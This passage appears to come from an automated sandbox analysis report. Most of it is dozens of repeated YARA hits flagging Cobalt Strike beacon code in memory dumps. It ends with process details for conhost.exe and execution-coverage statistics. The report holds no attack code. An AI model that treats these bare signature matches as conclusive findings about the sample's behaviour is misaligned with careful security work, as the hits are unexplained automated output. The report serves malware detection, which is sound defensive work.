                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3254891308.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3254891308.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3254891308.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3254891308.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2243689631.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2243689631.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2243689631.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2243689631.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2357499921.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2357499921.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2357499921.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2357499921.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2720385206.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2720385206.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2720385206.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2720385206.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3232473425.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3232473425.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3232473425.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3232473425.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2402975356.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2402975356.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2402975356.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2402975356.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3210222424.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3210222424.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3210222424.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3210222424.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2335299936.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2335299936.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2335299936.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2335299936.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2146934434.0000017F36AE0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2146934434.0000017F36AE0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2146934434.0000017F36AE0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2146934434.0000017F36AE0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2266293573.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2266293573.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2266293573.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2266293573.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3187878784.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3187878784.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3187878784.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3187878784.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2403086446.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2403086446.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2403086446.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2403086446.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3210341525.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3210341525.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3210341525.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3210341525.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3299179602.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3299179602.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3299179602.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3299179602.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3277090416.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3277090416.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3277090416.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3277090416.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2919850497.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2919850497.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2919850497.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2919850497.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3321307037.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3321307037.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3321307037.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3321307037.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3188050658.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3188050658.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3188050658.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3188050658.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3299071408.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3299071408.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3299071408.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3299071408.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2897678631.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2897678631.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2897678631.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2897678631.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2221740996.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2221740996.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2221740996.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2221740996.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2288264868.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2288264868.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2288264868.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2288264868.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2651458102.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2651458102.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2651458102.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2651458102.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2919720968.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2919720968.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2919720968.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2919720968.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3357924421.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3357924421.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3357924421.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.3357924421.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2674172378.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2674172378.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2674172378.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2674172378.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2221645510.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2221645510.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2221645510.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2221645510.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2425276670.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2425276670.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2425276670.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2425276670.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2380403205.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2380403205.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2380403205.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2380403205.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2357611219.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2357611219.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2357611219.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2357611219.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2170181010.0000017F36BBF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2170181010.0000017F36BBF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2170181010.0000017F36BBF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2170181010.0000017F36BBF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3276936352.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3276936352.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.3276936352.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.3276936352.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2380566087.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2380566087.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2380566087.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2380566087.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2266186373.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2266186373.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2266186373.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2266186373.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:low
                                                                                                                            Has exited:false

                                                                                                                            Target ID:1
                                                                                                                            Start time:17:12:07
                                                                                                                            Start date:19/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false


                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:3.8%
                                                                                                                              Dynamic/Decrypted Code Coverage:19.3%
                                                                                                                              Signature Coverage:49.9%
                                                                                                                              Total number of Nodes:337
                                                                                                                              Total number of Limit Nodes:8
                                                                                                                              APIs
                                                                                                                              Strings
